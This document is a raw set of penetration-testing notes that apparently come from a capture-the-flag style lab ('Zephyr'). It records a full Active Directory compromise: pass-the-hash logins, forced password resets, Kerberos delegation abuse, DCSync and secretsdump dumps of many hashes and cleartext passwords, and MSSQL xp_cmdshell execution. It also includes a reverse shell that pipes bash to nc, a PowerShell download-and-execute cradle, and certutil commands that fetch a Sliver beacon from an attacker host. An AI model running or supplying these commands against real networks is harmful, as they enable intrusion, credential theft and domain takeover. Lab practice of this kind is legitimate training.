192.168.110.53

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea james@192.168.110.53


C:\Users\Administrator\Desktop>type flag.txt
ZEPHYR{P3r5isT4nc3_1s_k3Y_4_M0v3men7} :persistance


cme smb 192.168.110.53 -u James -H 8af1903d3c80d3552a84b6ba296db2ea --local-auth --put-file WESTERN_DRUM.exe WESTERN_DRUM.exe 


Import-Module .\powerview.ps1

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity blake -AccountPassword $UserPassword -Verbose

getST.py -spn 'cifs/dc.painters.htb' -impersonate 'Administrator' -dc-ip 192.168.110.55 -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'painters.htb/blake'

export KRB5CCNAME=Administrator.ccache
wmiexec.py 'painters.htb/Administrator@dc.painters.htb' -no-pass -k


secretsdump.py -k dc.painters.htb

evil-winrm -i 192.168.110.55 -u Administrator -H 5bdd6a33efe43f0dc7e3b2435579aa53
evil-winrm -i 192.168.110.54 -u blake -p Password123!



.51

sudo su(.51)

Matt: L1f30f4Spr1ngCh1ck3n!


matt@mail:~$ sudo su
root@mail:/home/matt# ls
root@mail:/home/matt# cd /root
root@mail:~# ls
flag.txt  scripts
root@mail:~# cat flag.txt
ZEPHYR{L34v3_N0_St0n3_Un7urN3d} :Back Tracking
root@mail:~# 

.55

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b59ffc1f7fcd615577dab8436d3988fc:::
riley:1106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
blake:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
gavin:1108:aad3b435b51404eeaad3b435b51404ee:cb8ec920398da9fbb7c33b7b613b28d5:::
daniel:1109:aad3b435b51404eeaad3b435b51404ee:b084c663ad3f214e516e6f89c81c80d7:::
tom:1110:aad3b435b51404eeaad3b435b51404ee:dc51a409ab6cf835cbb9e471f27d8bc6:::
web_svc:1111:aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067:::
painters.htb\Matt:4101:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5869ab656006ee71af41d437a6788093:::
PNT-SVRSVC$:1103:aad3b435b51404eeaad3b435b51404ee:c206d294c947cecc0e60955004ff96c5:::
PNT-SVRBPA$:1104:aad3b435b51404eeaad3b435b51404ee:2dfcebbe9f5f4cb3bf98032887b3d7b6:::
PNT-SVRPSB$:1105:aad3b435b51404eeaad3b435b51404ee:7fc6b6b4b44a96617b5829a888b5a85a:::
MAINTENANCE$:2101:aad3b435b51404eeaad3b435b51404ee:fa8cde2a742ad8f6eb16e3d4bd5ed80b:::
WORKSTATION-1$:2103:aad3b435b51404eeaad3b435b51404ee:9ab46ef513f6f74ddf1ab492b8f542fa:::
ZSM$:2102:aad3b435b51404eeaad3b435b51404ee:eb6049eb57ae1ac50844b2ab2c73114e:::
 
painters.htb\Matt:CLEARTEXT:L1f30f4Spr1ngCh1ck3n!
 
 
 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{P41n73r_D0m41n_D0m1n4nc3} :Domination
 
 

Pingable and reachable cme host from 110.55

192.168.210.10: True
192.168.210.11: True
192.168.210.12: True
192.168.210.14: True
192.168.210.15: True
192.168.210.16: True

.52

**psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067 web_svc@192.168.110.52**

ZEPHYR{S3rV1c3_AcC0Un7_5PN_Tr0uBl35} :Disclousure

.56

evil-winrm -i 192.168.110.56 -u riley -p P@ssw0rd 
ZEPHYR{PwN1nG_W17h_P4s5W0rd_R3U53} : recycled

Ping Swep

 
192.168.210.10: True
 
192.168.210.12: True
192.168.210.13: True
 
192.168.210.16: True
 
└─$ cme smb 192.168.210.10-20
SMB         192.168.210.10  445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.11  445    ZPH-SVRMGMT1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRMGMT1) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.12  445    ZPH-SVRCA01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCA01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.15  445    ZPH-SVRSQL01     [*] Windows 10.0 Build 17763 x64 (name:ZPH-SVRSQL01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:zsm.local) (signing:False) (SMBv1:False)
 

.54

Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
 
through blake
 
 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{7h3_Tru57_h45_B3eN_Br0k3n} :Heartbreak
 
 
 
 
 

210.13

go run poc.go check -t https://192.168.210.13:443 -u Admin
 
 
[INFO] 2023/09/18 14:12 vul exist! target: https://192.168.210.13:443, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiODc1OWFjZDhhZmExZDdkN2FlNmM0ZGY5MmE1NzgwZTAiLCJzaWduIjoidEQ3WjBTMkd5NHNjTmVuTWJ3QmVWdkZwVXRDc25JVmlQZ3FuZG9SN1BVQkY2aldabVJ1eTJwUitBRkI4SnFub0ltV1NrMEx4WTVoZHBXQlpkbDZacWc9PSJ9
 

Copy the value in the cokkie session of SSO which will give u a dashboard

TF=$(mktemp) && echo 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 53 >/tmp/f")' >$TF && sudo nmap --script=$TF

nc -lvnp 53

/root/desktop
cat flag.txt
ZEPHYR{Abu51ng_d3f4ul7_Func710n4li7y_ftw} : Monitored


? (192.168.210.16) at 00:50:56:b9:58:7d [ether] on eth0
? (192.168.210.14) at 00:50:56:b9:11:b9 [ether] on eth0
? (192.168.210.10) at 00:50:56:b9:b9:4a [ether] on eth0
? (192.168.210.17) at 00:50:56:b9:79:b4 [ether] on eth0
? (192.168.210.15) at 00:50:56:b9:bc:fb [ether] on eth0
? (192.168.210.12) at 00:50:56:b9:b1:e1 [ether] on eth0
? (192.168.210.11) at 00:50:56:b9:1c:3e [ether] on eth0
? (192.168.210.18) at 00:50:56:b9:ae:dd [ether] on eth0
user     = debian-sys-maint
password = cK8y5D1ydIXX3VCI
 
 
root:$6$6f6giSmZBJf/.sxX$lxLJK6FwdiiKgWo593xCjV0yi2U29AU5d2v2tYLrnN8AoBKswgvSuQwKiUhSb3nEcDa4sbMTu2N/TRd304bgg0:19334:0:99999:7:::
 
 
find / -name zabbix* 2>/dev/null 
cat /usr/local/etc/zabbix_server.conf
 
 
 
DBName=zabbix
### Option: DBSchema # Schema name. Used for PostgreSQL. # # Mandatory: no # Default: # DBSchema= ### Option: DBUser # Database user. # # Mandatory: no # Default: # DBUser= 
DBUser=zabbix ### Option: DBPassword # Database password. # Comment this line if no password is used. # # Mandatory: no # Default: 
 
DBPassword=rDhHbBEfh35sMbkY
 
 
 
 
 
 
 
 
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.
 
 
 
└─$ hashcat -m 3200 marcus_hash --show                          
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.:!QAZ2wsx
 
 
 
 

Enumeration

└─$ cme smb 192.168.210.18 -u 'zabbix' -p 'rDhHbBEfh35sMbkY' --shares
SMB         192.168.210.18  445    ZPH-SVRCSUP      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCSUP) (domain:internal.zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.18  445    ZPH-SVRCSUP      [+] internal.zsm.local\zabbix:rDhHbBEfh35sMbkY 
SMB         192.168.210.18  445    ZPH-SVRCSUP      [*] Enumerated shares
SMB         192.168.210.18  445    ZPH-SVRCSUP      Share           Permissions     Remark
SMB         192.168.210.18  445    ZPH-SVRCSUP      -----           -----------     ------
SMB         192.168.210.18  445    ZPH-SVRCSUP      ADMIN$                          Remote Admin
SMB         192.168.210.18  445    ZPH-SVRCSUP      C$                              Default share
SMB         192.168.210.18  445    ZPH-SVRCSUP      IPC$            READ            Remote IPC
SMB         192.168.210.18  445    ZPH-SVRCSUP      loot            READ,WRITE      
SMB         192.168.210.18  445    ZPH-SVRCSUP      PublicShare     READ,WRITE  

210.15 MSSQL login

impacket-mssqlclient zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15 
 
 
exec_as_login sa
 
SQL (sa  dbo@zabbix_hosts)> xp_cmdshell whoami
output                   
----------------------   
nt service\mssqlserver   
 
 
 
port 53
 
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.9:443/large1.ps1") | powershell -noprofile'
generate beacon --http 10.10.14.9 --os windows --save .


EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.9:53/WESTERN_DRUM.exe C:\Users\Public\Documents\WESTERN_DRUM.exe'

EXEC xp_cmdshell 'C:\Users\Public\Documents\WESTERN_DRUM.exe'

sliver (WESTERN_DRUM) > certify find /vulnerable



for new windows se impersonation

[https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0](https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0 "https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0
(https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0)")



sliver (WESTERN_DRUM) > hashdump

[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::

	 * Username : ZPH-SVRSQL01$
	 * Domain   : ZSM
	 * NTLM     : ecf68b5e132ca80e6864215d5fcbba03
	 * SHA1     : bf1dfc13aaccdc957bb5246c19610667a88bfd60
 

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c Administrator@192.168.210.15


PS C:\Users\Administrator\Desktop> cat flag.txt
cat flag.txt
ZEPHYR{SQLi_2_Imp3rs0n4710n_fun} :The Statement
PS C:\Users\Administrator\Desktop> pwd
pwd

Path                          
----                          
C:\Users\Administrator\Desktop


cme smb 192.168.210.16 -u 'Administrator' -H 5bdd6a33efe43f0dc7e3b2435579aa53 -d painters.htb -M petitpotam


PETITPOT... 192.168.210.16  445    ZPH-SVRCDC01     VULNERABLE
PETITPOT... 192.168.210.16  445    ZPH-SVRCDC01     Next step: https://github.com/topotam/PetitPotam

Pingable host from .15

for i in {1..254};do (ping -c 1 192.168.210.$i | grep "bytes from" &);done

1..256 | % {"192.168.210.$($_): $(Test-Connection -count 1 -comp 192.168.210.$($_) -quiet)"}


192.168.210.10: True
192.168.210.12: True
192.168.210.13: True
192.168.210.15: True
192.168.210.16: True
192.168.210.19: True

changing password for jamie

 
Import-Module ./powerview.ps1
 
$SecPassword = ConvertTo-SecureString '!QAZ2wsx' -AsPlainText -Force
 
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\marcus', $SecPassword)
 
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
Set-DomainUserPassword -Identity jamie -AccountPassword $UserPassword -Credential $Cred -Verbose
 

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\jamie', $SecPassword)

Add-DomainGroupMember -Identity 'CA MANAGERS' -Members 'jamie' -Credential $Cred -Verbose

CA try Generic ALL of a Group on a SYStem

impacket-addcomputer -method SAMR -computer-pass 'Summer2018!' -computer-name attackersystem 'zsm.local/jamie:Password123!'

impacket-rbcd -delegate-from 'attackersystem' -delegate-to 'ZPH-SVRCA01$' -action 'write' 'zsm.local/jamie:Password123!'


$ComputerSid = Get-DomainComputer ATTACKERSYSTEM$ -Properties objectsid | Select -Expand objectsid
Get-ObjectAcl -DistinguishedName "CN=ZPH-SVRCA01,CN=Computers,DC=zsm,DC=local" -ResolveGUIDs | Where-Object { $_.IdentityReference -eq "zsm.local\CA Managers" -or $_.IdentityReference -eq "zsm.local\ca_svc" }

Get-DomainComputer ZPH-SVRCA01.zsm.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

210.11

└─$ certipy shadow auto -username marcus@zsm.local -p '!QAZ2wsx' -account ZPH-SVRMGMT1$ -dc-ip 192.168.210.10 -debug
 
 
pth-net rpc group addmem "General Management" "ca_svc" -U zsm.local/ZPH-SVRMGMT1\$%"ffffffffffffffffffffffffffffffff":"89d0b56874f61ad38bad336a77b8ef2f" -S 192.168.210.10
 
impacket-secretsdump 'zsm.local/jamie:Password123!@192.168.210.11'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
Waka:1000:aad3b435b51404eeaad3b435b51404ee:540e425b08537ae30e53b5d4c123385e:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-05-19 08:27:18)
ZSM.LOCAL/marcus:$DCC2$10240#marcus#66dddfc25df0d824e30c55a9ecccb512: (2023-09-19 04:32:12)
ZSM.LOCAL/jamie:$DCC2$10240#jamie#8eaa1e87b84f7197df2b836fae8e5c3c: (2022-10-28 12:56:42)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ZSM\ZPH-SVRMGMT1$:aes256-cts-hmac-sha1-96:937391acdbd6a5f63cf0f6700ac25aba7c8d747bcdd437f5efb419a12d8995c7
ZSM\ZPH-SVRMGMT1$:aes128-cts-hmac-sha1-96:d73da5795d36d46bf61b1afb40b247f5
ZSM\ZPH-SVRMGMT1$:des-cbc-md5:46620bf237cb1568
ZSM\ZPH-SVRMGMT1$:plain_password_hex:a59ff2202125f08774455a23ac8e623130743053e98d29eea3234cf4995bc3040b3e86e68c4ce7d681da4614f3b4d6066ce96a1a0257a1dca1221f864fcaf05f617d53ff9e6e7e8afedf8e4e70dd793440a6203fc780bbae017e795f3002958340850257b1caff49bcb045a861c67631dfb7f0ac6525ec72a9fd35035bfa1cb79578a785c08140a10abe5b756c2bcaa06ae1dceb3fe0f315a793c66aeaf35558deafd3d3796674de82fb98ba41878356fdde5ab8fc89dfe8a67c34015d64f03f52d515684b07c1bc9108daa73c6a63f49bf32e6403f850ae7d56ca6f2c49ca82fe414f14c100a2fb7cc901a2f07c52dc
ZSM\ZPH-SVRMGMT1$:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM 
 0000   95 E8 38 F2 47 8A 41 12  A5 77 CA 0A 23 E6 56 28   ..8.G.A..w..#.V(
 0010   85 56 73 10 A9 49 99 6A  B5 5D FB C5 AD B4 4C 76   .Vs..I.j.]....Lv
 0020   3A 07 D8 40 73 ED EE 03  28 5E A6 02 7E 09 38 EA   :..@s...(^..~.8.
 0030   48 55 7F 6D 9C FD 9A 8B  C1 F1 F4 D7 0A 6F 3B D0   HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
 
 
																
 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035 Administrator@192.168.210.11
 
net group "General Management" marcus /add /domain
 
 
 
 
certutil -urlcache -split -f http://10.10.17.10:53/SENSIBLE_CODE.exe
 
PS C:\Users\Administrator\Desktop> type flag.txt
type flag.txt
ZEPHYR{K3y_Cr3d3n714l_l1nk_d4ng3r} :Diverted
 
  [+] Host File(T1016)
    192.168.210.17 zephyr.bamboohr.htb
    192.168.210.18 zephyr.atlassian.htb
 
 
URL:
Login: melissa
Password: WinterIsHere2022!
# 210.16
 
 
python3 PetitPotam.py -u mssql_svc -p 'ToughPasswordToCrack123!' -d internal.zsm.local -dc-ip 192.168.210.16 10.10.17.66 192.168.210.16
 
 
 
 
 
[SMB] NTLMv2-SSP Client   : 10.10.110.35
[SMB] NTLMv2-SSP Username : internal\ZPH-SVRCDC01$
[SMB] NTLMv2-SSP Hash     : ZPH-SVRCDC01$::internal:d1c4901af08557de:8200E4599C9AEB7D5E34E4BAA800E1D1:01010000000000000053C1F939EBD901EBF9F918AAE7E40600000000020008005A0043004900480001001E00570049004E002D0055004A0046004100330054004800360041004500440004003400570049004E002D0055004A004600410033005400480036004100450044002E005A004300490048002E004C004F00430041004C00030014005A004300490048002E004C004F00430041004C00050014005A004300490048002E004C004F00430041004C00070008000053C1F939EBD9010600040002000000080030003000000000000000000000000040000093640A4F2CF1016AC550808CDD1CBE2AC82071074DD4AC2F71555AE06BB474790A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00360036000000000000000000

bloodhound-pyhton

bloodhound-python -u jamie -p 'Password123!' -ns 192.168.210.10 -d zsm.local -c all --dns-tcp --zip

bloodhound-python -u melissa -p 'WinterIsHere2022!' -ns 192.168.210.16 -d zsm.local -c all --dns-tcp --zip

bloodhound-python -u matt -p 'L1f30f4Spr1ngCh1ck3n!' -ns 192.168.110.55 -d painters.htb -c all --dns-tcp --zip

210.16

cme smb 192.168.210.16 -u 'melissa' -p 'WinterIsHere2022!' --shares

smbclient.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16






└─$ reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' backup -o '\\10.10.14.4\exegol'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.4\exegol\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.4\exegol\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.4\exegol\SECURITY.save



reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' query -keyName 'HKLM\SAM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SECURITY' -o '\\10.10.14.4\share'

Local secretsdump SAM

 impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY LOCAL 

*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM 
 0000   07 E9 F2 3F 08 49 46 07  02 CE 30 4B 65 D3 86 32   ...?.IF...0Ke..2
 0010   6F 02 5D 36 7D E8 30 33  F4 71 94 44 98 37 CB 1A   o.]6}.03.q.D.7..
 0020   05 CC 76 F1 26 E2 94 E7  D3 54 78 1F EF BE E9 13   ..v.&....Tx.....
 0030   30 3B 62 CB A5 57 75 E6  78 F3 D4 55 5C 68 20 15   0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Cleaning up...
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SAM' -o 'C:'
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o 'C:'
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SECURITY' -o 'C:'
 
 
smbclient.py -U melissa \\192.168.210.16\c$
 
 
get SAM.save
get SECURITY.save
get SYSTEM.save
 
 
finally, we can use impacket's secretdump to get the hashes
 
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
 
 
After some days struggling I come accross this article here  it describes how to do a DCSync attack using the Domain Controler Machine account.  It's the following:
 
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
 
└─$ secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
smith:17601:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:91d02ffbd6ca69bfb36bac9bd679bac1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ab4d5bbcb88a9344fbdfee0f8ad5825d043d41bd36743d95d0ec410b43b8f35d
Administrator:aes128-cts-hmac-sha1-96:7fe65b32357f19c0d5cf95675e789f00
Administrator:des-cbc-md5:6e3db9041a64803d
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
